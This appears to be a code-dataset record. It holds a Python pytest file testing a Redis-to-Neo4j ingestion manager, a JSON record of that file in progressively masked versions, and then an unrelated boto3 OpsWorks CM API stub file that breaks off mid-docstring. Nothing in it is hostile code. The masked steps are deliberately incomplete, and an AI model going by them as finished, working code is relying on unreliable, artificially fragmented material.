import giraffe.configuration.common_testing_artifactrs as commons from giraffe.business_logic.ingestion_manger import IngestionManager from redis import Redis def test_parse_redis_key(config_helper, ingestion_manager): im = ingestion_manager job_name = config_helper.nodes_ingestion_operation operation = config_helper.nodes_ingestion_operation labels = config_helper.test_labels parsed: IngestionManager.key_elements_type = im.parse_redis_key( key=f'{job_name}{config_helper.key_separator}{operation}{config_helper.key_separator}{",".join(labels)}') assert parsed.job_name == job_name assert parsed.operation == operation assert set(parsed.arguments) == set(labels) def test_publish_job(config_helper, redis_driver, ingestion_manager, nodes, edges, logger, redis_db): r: Redis = redis_driver im: IngestionManager = ingestion_manager commons.purge_redis_database(redis_db=redis_db, log=logger) # Populate nodes im.publish_job(job_name=config_helper.test_job_name, operation=config_helper.nodes_ingestion_operation, operation_arguments=','.join(config_helper.test_labels), items=[str(value) for value in nodes]) # Populate edges im.publish_job(job_name=config_helper.test_job_name, operation=config_helper.edges_ingestion_operation, operation_arguments=f'{config_helper.test_edge_type},{config_helper.test_labels[0]}', items=[str(value) for value in edges]) keys = r.keys(pattern=f'{config_helper.test_job_name}*') assert len(keys) == 2 node_keys = r.keys(pattern=f'{config_helper.test_job_name}{config_helper.key_separator}{config_helper.nodes_ingestion_operation}{config_helper.key_separator}*') assert len(node_keys) == 1 edges_keys = r.keys(pattern=f'{config_helper.test_job_name}{config_helper.key_separator}{config_helper.edges_ingestion_operation}{config_helper.key_separator}*') assert len(edges_keys) == 1 nodes_key = node_keys[0] edges_key = edges_keys[0] num_stored_nodes = r.scard(name=nodes_key) assert num_stored_nodes == len(nodes) num_stored_edges = r.scard(name=edges_key) assert num_stored_edges == len(edges) def test_process_job(config_helper, ingestion_manager, redis_db, logger, neo): commons.purge_redis_database(redis_db=redis_db, log=logger) commons.purge_neo4j_database(log=logger, neo=neo) commons.init_redis_test_data(im=ingestion_manager) im = ingestion_manager im.process_redis_content(translation_id=config_helper.test_job_name, request_id='unit-testing') query = f'MATCH (:{config_helper.test_labels[0]}) RETURN COUNT(*) AS count' count = neo.pull_query(query=query).value()[0] assert count == config_helper.number_of_test_nodes query = f'MATCH ()-[:{config_helper.test_edge_type}]->() RETURN COUNT(*) AS count' count = neo.pull_query(query=query).value()[0] assert count == config_helper.number_of_test_edges
normal
{ "blob_id": "13451352e8dcdfe64771f9fc188b13a31b8109f5", "index": 4555, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef test_parse_redis_key(config_helper, ingestion_manager):\n im = ingestion_manager\n job_name = config_helper.nodes_ingestion_operation\n operation = config_helper.nodes_ingestion_operation\n labels = config_helper.test_labels\n parsed: IngestionManager.key_elements_type = im.parse_redis_key(key=\n f\"{job_name}{config_helper.key_separator}{operation}{config_helper.key_separator}{','.join(labels)}\"\n )\n assert parsed.job_name == job_name\n assert parsed.operation == operation\n assert set(parsed.arguments) == set(labels)\n\n\n<mask token>\n\n\ndef test_process_job(config_helper, ingestion_manager, redis_db, logger, neo):\n commons.purge_redis_database(redis_db=redis_db, log=logger)\n commons.purge_neo4j_database(log=logger, neo=neo)\n commons.init_redis_test_data(im=ingestion_manager)\n im = ingestion_manager\n im.process_redis_content(translation_id=config_helper.test_job_name,\n request_id='unit-testing')\n query = f'MATCH (:{config_helper.test_labels[0]}) RETURN COUNT(*) AS count'\n count = neo.pull_query(query=query).value()[0]\n assert count == config_helper.number_of_test_nodes\n query = (\n f'MATCH ()-[:{config_helper.test_edge_type}]->() RETURN COUNT(*) AS count'\n )\n count = neo.pull_query(query=query).value()[0]\n assert count == config_helper.number_of_test_edges\n", "step-3": "<mask token>\n\n\ndef test_parse_redis_key(config_helper, ingestion_manager):\n im = ingestion_manager\n job_name = config_helper.nodes_ingestion_operation\n operation = config_helper.nodes_ingestion_operation\n labels = config_helper.test_labels\n parsed: IngestionManager.key_elements_type = im.parse_redis_key(key=\n f\"{job_name}{config_helper.key_separator}{operation}{config_helper.key_separator}{','.join(labels)}\"\n )\n assert parsed.job_name == job_name\n assert parsed.operation == operation\n assert set(parsed.arguments) == set(labels)\n\n\ndef test_publish_job(config_helper, redis_driver, ingestion_manager, nodes,\n edges, logger, redis_db):\n r: Redis = redis_driver\n im: IngestionManager = ingestion_manager\n commons.purge_redis_database(redis_db=redis_db, log=logger)\n im.publish_job(job_name=config_helper.test_job_name, operation=\n config_helper.nodes_ingestion_operation, operation_arguments=','.\n join(config_helper.test_labels), items=[str(value) for value in nodes])\n im.publish_job(job_name=config_helper.test_job_name, operation=\n config_helper.edges_ingestion_operation, operation_arguments=\n f'{config_helper.test_edge_type},{config_helper.test_labels[0]}',\n items=[str(value) for value in edges])\n keys = r.keys(pattern=f'{config_helper.test_job_name}*')\n assert len(keys) == 2\n node_keys = r.keys(pattern=\n f'{config_helper.test_job_name}{config_helper.key_separator}{config_helper.nodes_ingestion_operation}{config_helper.key_separator}*'\n )\n assert len(node_keys) == 1\n edges_keys = r.keys(pattern=\n f'{config_helper.test_job_name}{config_helper.key_separator}{config_helper.edges_ingestion_operation}{config_helper.key_separator}*'\n )\n assert len(edges_keys) == 1\n nodes_key = node_keys[0]\n edges_key = edges_keys[0]\n num_stored_nodes = r.scard(name=nodes_key)\n assert num_stored_nodes == len(nodes)\n num_stored_edges = r.scard(name=edges_key)\n assert num_stored_edges == len(edges)\n\n\ndef test_process_job(config_helper, ingestion_manager, redis_db, logger, neo):\n commons.purge_redis_database(redis_db=redis_db, log=logger)\n commons.purge_neo4j_database(log=logger, neo=neo)\n commons.init_redis_test_data(im=ingestion_manager)\n im = ingestion_manager\n im.process_redis_content(translation_id=config_helper.test_job_name,\n request_id='unit-testing')\n query = f'MATCH (:{config_helper.test_labels[0]}) RETURN COUNT(*) AS count'\n count = neo.pull_query(query=query).value()[0]\n assert count == config_helper.number_of_test_nodes\n query = (\n f'MATCH ()-[:{config_helper.test_edge_type}]->() RETURN COUNT(*) AS count'\n )\n count = neo.pull_query(query=query).value()[0]\n assert count == config_helper.number_of_test_edges\n", "step-4": "import giraffe.configuration.common_testing_artifactrs as commons\nfrom giraffe.business_logic.ingestion_manger import IngestionManager\nfrom redis import Redis\n\n\ndef test_parse_redis_key(config_helper, ingestion_manager):\n im = ingestion_manager\n job_name = config_helper.nodes_ingestion_operation\n operation = config_helper.nodes_ingestion_operation\n labels = config_helper.test_labels\n parsed: IngestionManager.key_elements_type = im.parse_redis_key(key=\n f\"{job_name}{config_helper.key_separator}{operation}{config_helper.key_separator}{','.join(labels)}\"\n )\n assert parsed.job_name == job_name\n assert parsed.operation == operation\n assert set(parsed.arguments) == set(labels)\n\n\ndef test_publish_job(config_helper, redis_driver, ingestion_manager, nodes,\n edges, logger, redis_db):\n r: Redis = redis_driver\n im: IngestionManager = ingestion_manager\n commons.purge_redis_database(redis_db=redis_db, log=logger)\n im.publish_job(job_name=config_helper.test_job_name, operation=\n config_helper.nodes_ingestion_operation, operation_arguments=','.\n join(config_helper.test_labels), items=[str(value) for value in nodes])\n im.publish_job(job_name=config_helper.test_job_name, operation=\n config_helper.edges_ingestion_operation, operation_arguments=\n f'{config_helper.test_edge_type},{config_helper.test_labels[0]}',\n items=[str(value) for value in edges])\n keys = r.keys(pattern=f'{config_helper.test_job_name}*')\n assert len(keys) == 2\n node_keys = r.keys(pattern=\n f'{config_helper.test_job_name}{config_helper.key_separator}{config_helper.nodes_ingestion_operation}{config_helper.key_separator}*'\n )\n assert len(node_keys) == 1\n edges_keys = r.keys(pattern=\n f'{config_helper.test_job_name}{config_helper.key_separator}{config_helper.edges_ingestion_operation}{config_helper.key_separator}*'\n )\n assert len(edges_keys) == 1\n nodes_key = node_keys[0]\n edges_key = edges_keys[0]\n num_stored_nodes = r.scard(name=nodes_key)\n assert num_stored_nodes == len(nodes)\n num_stored_edges = r.scard(name=edges_key)\n assert num_stored_edges == len(edges)\n\n\ndef test_process_job(config_helper, ingestion_manager, redis_db, logger, neo):\n commons.purge_redis_database(redis_db=redis_db, log=logger)\n commons.purge_neo4j_database(log=logger, neo=neo)\n commons.init_redis_test_data(im=ingestion_manager)\n im = ingestion_manager\n im.process_redis_content(translation_id=config_helper.test_job_name,\n request_id='unit-testing')\n query = f'MATCH (:{config_helper.test_labels[0]}) RETURN COUNT(*) AS count'\n count = neo.pull_query(query=query).value()[0]\n assert count == config_helper.number_of_test_nodes\n query = (\n f'MATCH ()-[:{config_helper.test_edge_type}]->() RETURN COUNT(*) AS count'\n )\n count = neo.pull_query(query=query).value()[0]\n assert count == config_helper.number_of_test_edges\n", "step-5": "import giraffe.configuration.common_testing_artifactrs as commons\nfrom giraffe.business_logic.ingestion_manger import IngestionManager\nfrom redis import Redis\n\n\ndef test_parse_redis_key(config_helper, ingestion_manager):\n im = ingestion_manager\n job_name = config_helper.nodes_ingestion_operation\n operation = config_helper.nodes_ingestion_operation\n labels = config_helper.test_labels\n parsed: IngestionManager.key_elements_type = im.parse_redis_key(\n key=f'{job_name}{config_helper.key_separator}{operation}{config_helper.key_separator}{\",\".join(labels)}')\n assert parsed.job_name == job_name\n assert parsed.operation == operation\n assert set(parsed.arguments) == set(labels)\n\n\ndef test_publish_job(config_helper, redis_driver, ingestion_manager, nodes, edges, logger, redis_db):\n r: Redis = redis_driver\n im: IngestionManager = ingestion_manager\n\n commons.purge_redis_database(redis_db=redis_db, log=logger)\n\n # Populate nodes\n im.publish_job(job_name=config_helper.test_job_name,\n operation=config_helper.nodes_ingestion_operation,\n operation_arguments=','.join(config_helper.test_labels),\n items=[str(value) for value in nodes])\n\n # Populate edges\n im.publish_job(job_name=config_helper.test_job_name,\n operation=config_helper.edges_ingestion_operation,\n operation_arguments=f'{config_helper.test_edge_type},{config_helper.test_labels[0]}',\n items=[str(value) for value in edges])\n\n keys = r.keys(pattern=f'{config_helper.test_job_name}*')\n assert len(keys) == 2\n node_keys = r.keys(pattern=f'{config_helper.test_job_name}{config_helper.key_separator}{config_helper.nodes_ingestion_operation}{config_helper.key_separator}*')\n assert len(node_keys) == 1\n edges_keys = r.keys(pattern=f'{config_helper.test_job_name}{config_helper.key_separator}{config_helper.edges_ingestion_operation}{config_helper.key_separator}*')\n assert len(edges_keys) == 1\n\n nodes_key = node_keys[0]\n edges_key = edges_keys[0]\n\n num_stored_nodes = r.scard(name=nodes_key)\n assert num_stored_nodes == len(nodes)\n num_stored_edges = r.scard(name=edges_key)\n assert num_stored_edges == len(edges)\n\n\ndef test_process_job(config_helper, ingestion_manager, redis_db, logger, neo):\n commons.purge_redis_database(redis_db=redis_db, log=logger)\n commons.purge_neo4j_database(log=logger, neo=neo)\n commons.init_redis_test_data(im=ingestion_manager)\n im = ingestion_manager\n im.process_redis_content(translation_id=config_helper.test_job_name, request_id='unit-testing')\n query = f'MATCH (:{config_helper.test_labels[0]}) RETURN COUNT(*) AS count'\n count = neo.pull_query(query=query).value()[0]\n assert count == config_helper.number_of_test_nodes\n query = f'MATCH ()-[:{config_helper.test_edge_type}]->() RETURN COUNT(*) AS count'\n count = neo.pull_query(query=query).value()[0]\n assert count == config_helper.number_of_test_edges\n", "step-ids": [ 0, 2, 3, 4, 5 ] }
[ 0, 2, 3, 4, 5 ]
''' The MIT License (MIT) Copyright (c) 2016 WavyCloud Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ''' def associate_node(ServerName=None, NodeName=None, EngineAttributes=None): """ See also: AWS API Documentation :example: response = client.associate_node( ServerName='string', NodeName='string', EngineAttributes=[ { 'Name': 'string', 'Value': 'string' }, ] ) :type ServerName: string :param ServerName: [REQUIRED] :type NodeName: string :param NodeName: [REQUIRED] :type EngineAttributes: list :param EngineAttributes: (dict) --A name/value pair that is specific to the engine of the server. Name (string) --The name of the engine attribute. Value (string) --The value of the engine attribute. :rtype: dict :return: { 'NodeAssociationStatusToken': 'string' } :returns: (dict) -- NodeAssociationStatusToken (string) -- """ pass def can_paginate(operation_name=None): """ Check if an operation can be paginated. :type operation_name: string :param operation_name: The operation name. This is the same name as the method name on the client. For example, if the method name is create_foo, and you'd normally invoke the operation as client.create_foo(**kwargs), if the create_foo operation can be paginated, you can use the call client.get_paginator('create_foo'). """ pass def create_backup(ServerName=None, Description=None): """ Creates an application-level backup of a server. While the server is BACKING_UP , the server can not be modified and no additional backup can be created. Backups can be created for RUNNING , HEALTHY and UNHEALTHY servers. This operation is asnychronous. By default 50 manual backups can be created. A LimitExceededException is thrown then the maximum number of manual backup is reached. A InvalidStateException is thrown when the server is not in any of RUNNING, HEALTHY, UNHEALTHY. A ResourceNotFoundException is thrown when the server is not found. A ValidationException is thrown when parameters of the request are not valid. See also: AWS API Documentation :example: response = client.create_backup( ServerName='string', Description='string' ) :type ServerName: string :param ServerName: [REQUIRED] The name of the server that you want to back up. :type Description: string :param Description: A user-defined description of the backup. :rtype: dict :return: { 'Backup': { 'BackupArn': 'string', 'BackupId': 'string', 'BackupType': 'AUTOMATED'|'MANUAL', 'CreatedAt': datetime(2015, 1, 1), 'Description': 'string', 'Engine': 'string', 'EngineModel': 'string', 'EngineVersion': 'string', 'InstanceProfileArn': 'string', 'InstanceType': 'string', 'KeyPair': 'string', 'PreferredBackupWindow': 'string', 'PreferredMaintenanceWindow': 'string', 'S3DataSize': 123, 'S3DataUrl': 'string', 'S3LogUrl': 'string', 'SecurityGroupIds': [ 'string', ], 'ServerName': 'string', 'ServiceRoleArn': 'string', 'Status': 'IN_PROGRESS'|'OK'|'FAILED'|'DELETING', 'StatusDescription': 'string', 'SubnetIds': [ 'string', ], 'ToolsVersion': 'string', 'UserArn': 'string' } } :returns: (string) -- """ pass def create_server(DisableAutomatedBackup=None, Engine=None, EngineModel=None, EngineVersion=None, EngineAttributes=None, BackupRetentionCount=None, ServerName=None, InstanceProfileArn=None, InstanceType=None, KeyPair=None, PreferredMaintenanceWindow=None, PreferredBackupWindow=None, SecurityGroupIds=None, ServiceRoleArn=None, SubnetIds=None, BackupId=None): """ Creates and immedately starts a new Server. The server can be used once it has reached the HEALTHY state. This operation is asnychronous. A LimitExceededException is thrown then the maximum number of server backup is reached. A ResourceAlreadyExistsException is raise when a server with the same name already exists in the account. A ResourceNotFoundException is thrown when a backupId is passed, but the backup does not exist. A ValidationException is thrown when parameters of the request are not valid. By default 10 servers can be created. A LimitExceededException is raised when the limit is exceeded. When no security groups are provided by using SecurityGroupIds , AWS OpsWorks creates a new security group. This security group opens the Chef server to the world on TCP port 443. If a KeyName is present, SSH access is enabled. SSH is also open to the world on TCP port 22. By default, the Chef Server is accessible from any IP address. We recommend that you update your security group rules to allow access from known IP addresses and address ranges only. To edit security group rules, open Security Groups in the navigation pane of the EC2 management console. See also: AWS API Documentation :example: response = client.create_server( DisableAutomatedBackup=True|False, Engine='string', EngineModel='string', EngineVersion='string', EngineAttributes=[ { 'Name': 'string', 'Value': 'string' }, ], BackupRetentionCount=123, ServerName='string', InstanceProfileArn='string', InstanceType='string', KeyPair='string', PreferredMaintenanceWindow='string', PreferredBackupWindow='string', SecurityGroupIds=[ 'string', ], ServiceRoleArn='string', SubnetIds=[ 'string', ], BackupId='string' ) :type DisableAutomatedBackup: boolean :param DisableAutomatedBackup: Enable or disable scheduled backups. Valid values are true or false . The default value is true . :type Engine: string :param Engine: The configuration management engine to use. Valid values include Chef . :type EngineModel: string :param EngineModel: The engine model, or option. Valid values include Single . :type EngineVersion: string :param EngineVersion: The major release version of the engine that you want to use. Values depend on the engine that you choose. :type EngineAttributes: list :param EngineAttributes: Engine attributes on a specified server. Attributes accepted in a createServer request: CHEF_PIVOTAL_KEY : A base64-encoded RSA private key that is not stored by AWS OpsWorks for Chef Automate. This private key is required to access the Chef API. (dict) --A name/value pair that is specific to the engine of the server. Name (string) --The name of the engine attribute. Value (string) --The value of the engine attribute. :type BackupRetentionCount: integer :param BackupRetentionCount: The number of automated backups that you want to keep. Whenever a new backup is created, AWS OpsWorks for Chef Automate deletes the oldest backups if this number is exceeded. The default value is 1 . :type ServerName: string :param ServerName: [REQUIRED] The name of the server. The server name must be unique within your AWS account, within each region. Server names must start with a letter; then letters, numbers, or hyphens (-) are allowed, up to a maximum of 32 characters. :type InstanceProfileArn: string :param InstanceProfileArn: [REQUIRED] The ARN of the instance profile that your Amazon EC2 instances use. Although the AWS OpsWorks console typically creates the instance profile for you, in this release of AWS OpsWorks for Chef Automate, run the service-role-creation.yaml AWS CloudFormation template, located at https://s3.amazonaws.com/opsworks-stuff/latest/service-role-creation.yaml. This template creates a stack that includes the instance profile you need. :type InstanceType: string :param InstanceType: The Amazon EC2 instance type to use. Valid values must be specified in the following format: ^([cm][34]|t2).* For example, c3.large . :type KeyPair: string :param KeyPair: The Amazon EC2 key pair to set for the instance. You may specify this parameter to connect to your instances by using SSH. :type PreferredMaintenanceWindow: string :param PreferredMaintenanceWindow: The start time for a one-hour period each week during which AWS OpsWorks for Chef Automate performs maintenance on the instance. Valid values must be specified in the following format: DDD:HH:MM . The specified time is in coordinated universal time (UTC). The default value is a random one-hour period on Tuesday, Wednesday, or Friday. See TimeWindowDefinition for more information. Example: Mon:08:00 , which represents a start time of every Monday at 08:00 UTC. (8:00 a.m.) :type PreferredBackupWindow: string :param PreferredBackupWindow: The start time for a one-hour period during which AWS OpsWorks for Chef Automate backs up application-level data on your server if backups are enabled. Valid values must be specified in one of the following formats: HH:MM for daily backups DDD:HH:MM for weekly backups The specified time is in coordinated universal time (UTC). The default value is a random, daily start time. Example: 08:00 , which represents a daily start time of 08:00 UTC.Example: Mon:08:00 , which represents a start time of every Monday at 08:00 UTC. (8:00 a.m.) :type SecurityGroupIds: list :param SecurityGroupIds: A list of security group IDs to attach to the Amazon EC2 instance. If you add this parameter, the specified security groups must be within the VPC that is specified by SubnetIds . If you do not specify this parameter, AWS OpsWorks for Chef Automate creates one new security group that uses TCP ports 22 and 443, open to 0.0.0.0/0 (everyone). (string) -- :type ServiceRoleArn: string :param ServiceRoleArn: [REQUIRED] The service role that the AWS OpsWorks for Chef Automate service backend uses to work with your account. Although the AWS OpsWorks console typically creates the service role for you, in this release of AWS OpsWorks for Chef Automate, run the service-role-creation.yaml AWS CloudFormation template, located at https://s3.amazonaws.com/opsworks-stuff/latest/service-role-creation.yaml. This template creates a stack that includes the service role that you need. :type SubnetIds: list :param SubnetIds: The IDs of subnets in which to launch the server EC2 instance. Amazon EC2-Classic customers: This field is required. All servers must run within a VPC. The VPC must have 'Auto Assign Public IP' enabled. EC2-VPC customers: This field is optional. If you do not specify subnet IDs, your EC2 instances are created in a default subnet that is selected by Amazon EC2. If you specify subnet IDs, the VPC must have 'Auto Assign Public IP' enabled. For more information about supported Amazon EC2 platforms, see Supported Platforms . (string) -- :type BackupId: string :param BackupId: If you specify this field, AWS OpsWorks for Chef Automate creates the server by using the backup represented by BackupId. :rtype: dict :return: { 'Server': { 'BackupRetentionCount': 123, 'ServerName': 'string', 'CreatedAt': datetime(2015, 1, 1), 'DisableAutomatedBackup': True|False, 'Endpoint': 'string', 'Engine': 'string', 'EngineModel': 'string', 'EngineAttributes': [ { 'Name': 'string', 'Value': 'string' }, ], 'EngineVersion': 'string', 'InstanceProfileArn': 'string', 'InstanceType': 'string', 'KeyPair': 'string', 'MaintenanceStatus': 'SUCCESS'|'FAILED', 'PreferredMaintenanceWindow': 'string', 'PreferredBackupWindow': 'string', 'SecurityGroupIds': [ 'string', ], 'ServiceRoleArn': 'string', 'Status': 'BACKING_UP'|'CONNECTION_LOST'|'CREATING'|'DELETING'|'MODIFYING'|'FAILED'|'HEALTHY'|'RUNNING'|'SETUP'|'UNDER_MAINTENANCE'|'UNHEALTHY', 'StatusReason': 'string', 'SubnetIds': [ 'string', ], 'ServerArn': 'string' } } :returns: CHEF_PIVOTAL_KEY : A base64-encoded RSA private key that is generated by AWS OpsWorks for Chef Automate. This private key is required to access the Chef API. CHEF_STARTER_KIT : A base64-encoded ZIP file. The ZIP file contains a Chef starter kit, which includes a README, a configuration file, and the required RSA private key. Save this file, unzip it, and then change to the directory where you've unzipped the file contents. From this directory, you can run Knife commands. """ pass def delete_backup(BackupId=None): """ Deletes a backup. You can delete both manual and automated backups. This operation is asynchronous. A InvalidStateException is thrown then a backup is already deleting. A ResourceNotFoundException is thrown when the backup does not exist. A ValidationException is thrown when parameters of the request are not valid. See also: AWS API Documentation :example: response = client.delete_backup( BackupId='string' ) :type BackupId: string :param BackupId: [REQUIRED] The ID of the backup to delete. Run the DescribeBackups command to get a list of backup IDs. Backup IDs are in the format ServerName-yyyyMMddHHmmssSSS . :rtype: dict :return: {} """ pass def delete_server(ServerName=None): """ Deletes the server and the underlying AWS CloudFormation stack (including the server's EC2 instance). The server status updated to DELETING . Once the server is successfully deleted, it will no longer be returned by DescribeServer requests. If the AWS CloudFormation stack cannot be deleted, the server cannot be deleted. This operation is asynchronous. A InvalidStateException is thrown then a server is already deleting. A ResourceNotFoundException is thrown when the server does not exist. A ValidationException is raised when parameters of the request are invalid. See also: AWS API Documentation :example: response = client.delete_server( ServerName='string' ) :type ServerName: string :param ServerName: [REQUIRED] The ID of the server to delete. :rtype: dict :return: {} """ pass def describe_account_attributes(): """ Describes your account attributes, and creates requests to increase limits before they are reached or exceeded. This operation is synchronous. See also: AWS API Documentation :example: response = client.describe_account_attributes() :rtype: dict :return: { 'Attributes': [ { 'Name': 'string', 'Maximum': 123, 'Used': 123 }, ] } """ pass def describe_backups(BackupId=None, ServerName=None, NextToken=None, MaxResults=None): """ Describes backups. The results are ordered by time, with newest backups first. If you do not specify a BackupId or ServerName, the command returns all backups. This operation is synchronous. A ResourceNotFoundException is thrown when the backup does not exist. A ValidationException is raised when parameters of the request are invalid. See also: AWS API Documentation :example: response = client.describe_backups( BackupId='string', ServerName='string', NextToken='string', MaxResults=123 ) :type BackupId: string :param BackupId: Describes a single backup. :type ServerName: string :param ServerName: Returns backups for the server with the specified ServerName. :type NextToken: string :param NextToken: NextToken is a string that is returned in some command responses. It indicates that not all entries have been returned, and that you must run at least one more request to get remaining items. To get remaining results, call DescribeBackups again, and assign the token from the previous results as the value of the nextToken parameter. If there are no more results, the response object's nextToken parameter value is null . Setting a nextToken value that was not returned in your previous results causes an InvalidNextTokenException to occur. :type MaxResults: integer :param MaxResults: To receive a paginated response, use this parameter to specify the maximum number of results to be returned with a single call. If the number of available results exceeds this maximum, the response includes a NextToken value that you can assign to the NextToken request parameter to get the next set of results. :rtype: dict :return: { 'Backups': [ { 'BackupArn': 'string', 'BackupId': 'string', 'BackupType': 'AUTOMATED'|'MANUAL', 'CreatedAt': datetime(2015, 1, 1), 'Description': 'string', 'Engine': 'string', 'EngineModel': 'string', 'EngineVersion': 'string', 'InstanceProfileArn': 'string', 'InstanceType': 'string', 'KeyPair': 'string', 'PreferredBackupWindow': 'string', 'PreferredMaintenanceWindow': 'string', 'S3DataSize': 123, 'S3DataUrl': 'string', 'S3LogUrl': 'string', 'SecurityGroupIds': [ 'string', ], 'ServerName': 'string', 'ServiceRoleArn': 'string', 'Status': 'IN_PROGRESS'|'OK'|'FAILED'|'DELETING', 'StatusDescription': 'string', 'SubnetIds': [ 'string', ], 'ToolsVersion': 'string', 'UserArn': 'string' }, ], 'NextToken': 'string' } :returns: (string) -- """ pass def describe_events(ServerName=None, NextToken=None, MaxResults=None): """ Describes events for a specified server. Results are ordered by time, with newest events first. This operation is synchronous. A ResourceNotFoundException is thrown when the server does not exist. A ValidationException is raised when parameters of the request are invalid. See also: AWS API Documentation :example: response = client.describe_events( ServerName='string', NextToken='string', MaxResults=123 ) :type ServerName: string :param ServerName: [REQUIRED] The name of the server for which you want to view events. :type NextToken: string :param NextToken: NextToken is a string that is returned in some command responses. It indicates that not all entries have been returned, and that you must run at least one more request to get remaining items. To get remaining results, call DescribeEvents again, and assign the token from the previous results as the value of the nextToken parameter. If there are no more results, the response object's nextToken parameter value is null . Setting a nextToken value that was not returned in your previous results causes an InvalidNextTokenException to occur. :type MaxResults: integer :param MaxResults: To receive a paginated response, use this parameter to specify the maximum number of results to be returned with a single call. If the number of available results exceeds this maximum, the response includes a NextToken value that you can assign to the NextToken request parameter to get the next set of results. :rtype: dict :return: { 'ServerEvents': [ { 'CreatedAt': datetime(2015, 1, 1), 'ServerName': 'string', 'Message': 'string', 'LogUrl': 'string' }, ], 'NextToken': 'string' } """ pass def describe_node_association_status(NodeAssociationStatusToken=None, ServerName=None): """ See also: AWS API Documentation :example: response = client.describe_node_association_status( NodeAssociationStatusToken='string', ServerName='string' ) :type NodeAssociationStatusToken: string :param NodeAssociationStatusToken: [REQUIRED] :type ServerName: string :param ServerName: [REQUIRED] :rtype: dict :return: { 'NodeAssociationStatus': 'SUCCESS'|'FAILED'|'IN_PROGRESS' } :returns: (dict) -- NodeAssociationStatus (string) -- """ pass def describe_servers(ServerName=None, NextToken=None, MaxResults=None): """ Lists all configuration management servers that are identified with your account. Only the stored results from Amazon DynamoDB are returned. AWS OpsWorks for Chef Automate does not query other services. This operation is synchronous. A ResourceNotFoundException is thrown when the server does not exist. A ValidationException is raised when parameters of the request are invalid. See also: AWS API Documentation :example: response = client.describe_servers( ServerName='string', NextToken='string', MaxResults=123 ) :type ServerName: string :param ServerName: Describes the server with the specified ServerName. :type NextToken: string :param NextToken: NextToken is a string that is returned in some command responses. It indicates that not all entries have been returned, and that you must run at least one more request to get remaining items. To get remaining results, call DescribeServers again, and assign the token from the previous results as the value of the nextToken parameter. If there are no more results, the response object's nextToken parameter value is null . Setting a nextToken value that was not returned in your previous results causes an InvalidNextTokenException to occur. :type MaxResults: integer :param MaxResults: To receive a paginated response, use this parameter to specify the maximum number of results to be returned with a single call. If the number of available results exceeds this maximum, the response includes a NextToken value that you can assign to the NextToken request parameter to get the next set of results. :rtype: dict :return: { 'Servers': [ { 'BackupRetentionCount': 123, 'ServerName': 'string', 'CreatedAt': datetime(2015, 1, 1), 'DisableAutomatedBackup': True|False, 'Endpoint': 'string', 'Engine': 'string', 'EngineModel': 'string', 'EngineAttributes': [ { 'Name': 'string', 'Value': 'string' }, ], 'EngineVersion': 'string', 'InstanceProfileArn': 'string', 'InstanceType': 'string', 'KeyPair': 'string', 'MaintenanceStatus': 'SUCCESS'|'FAILED', 'PreferredMaintenanceWindow': 'string', 'PreferredBackupWindow': 'string', 'SecurityGroupIds': [ 'string', ], 'ServiceRoleArn': 'string', 'Status': 'BACKING_UP'|'CONNECTION_LOST'|'CREATING'|'DELETING'|'MODIFYING'|'FAILED'|'HEALTHY'|'RUNNING'|'SETUP'|'UNDER_MAINTENANCE'|'UNHEALTHY', 'StatusReason': 'string', 'SubnetIds': [ 'string', ], 'ServerArn': 'string' }, ], 'NextToken': 'string' } :returns: CHEF_PIVOTAL_KEY : A base64-encoded RSA private key that is generated by AWS OpsWorks for Chef Automate. This private key is required to access the Chef API. CHEF_STARTER_KIT : A base64-encoded ZIP file. The ZIP file contains a Chef starter kit, which includes a README, a configuration file, and the required RSA private key. Save this file, unzip it, and then change to the directory where you've unzipped the file contents. From this directory, you can run Knife commands. """ pass def disassociate_node(ServerName=None, NodeName=None, EngineAttributes=None): """ See also: AWS API Documentation :example: response = client.disassociate_node( ServerName='string', NodeName='string', EngineAttributes=[ { 'Name': 'string', 'Value': 'string' }, ] ) :type ServerName: string :param ServerName: [REQUIRED] :type NodeName: string :param NodeName: [REQUIRED] :type EngineAttributes: list :param EngineAttributes: (dict) --A name/value pair that is specific to the engine of the server. Name (string) --The name of the engine attribute. Value (string) --The value of the engine attribute. :rtype: dict :return: { 'NodeAssociationStatusToken': 'string' } :returns: (dict) -- NodeAssociationStatusToken (string) -- """ pass def generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None): """ Generate a presigned url given a client, its method, and arguments :type ClientMethod: string :param ClientMethod: The client method to presign for :type Params: dict :param Params: The parameters normally passed to ClientMethod. :type ExpiresIn: int :param ExpiresIn: The number of seconds the presigned url is valid for. By default it expires in an hour (3600 seconds) :type HttpMethod: string :param HttpMethod: The http method to use on the generated url. By default, the http method is whatever is used in the method's model. """ pass def get_paginator(operation_name=None): """ Create a paginator for an operation. :type operation_name: string :param operation_name: The operation name. This is the same name as the method name on the client. For example, if the method name is create_foo, and you'd normally invoke the operation as client.create_foo(**kwargs), if the create_foo operation can be paginated, you can use the call client.get_paginator('create_foo'). :rtype: L{botocore.paginate.Paginator} """ pass def get_waiter(): """ """ pass def restore_server(BackupId=None, ServerName=None, InstanceType=None, KeyPair=None): """ Restores a backup to a server that is in a RUNNING , FAILED , or HEALTHY state. When you run RestoreServer, the server's EC2 instance is deleted, and a new EC2 instance is configured. RestoreServer maintains the existing server endpoint, so configuration management of all of the server's client devices should continue to work. This operation is asynchronous. A InvalidStateException is thrown when the server is not in a valid state. A ResourceNotFoundException is thrown when the server does not exist. A ValidationException is raised when parameters of the request are invalid. See also: AWS API Documentation :example: response = client.restore_server( BackupId='string', ServerName='string', InstanceType='string', KeyPair='string' ) :type BackupId: string :param BackupId: [REQUIRED] The ID of the 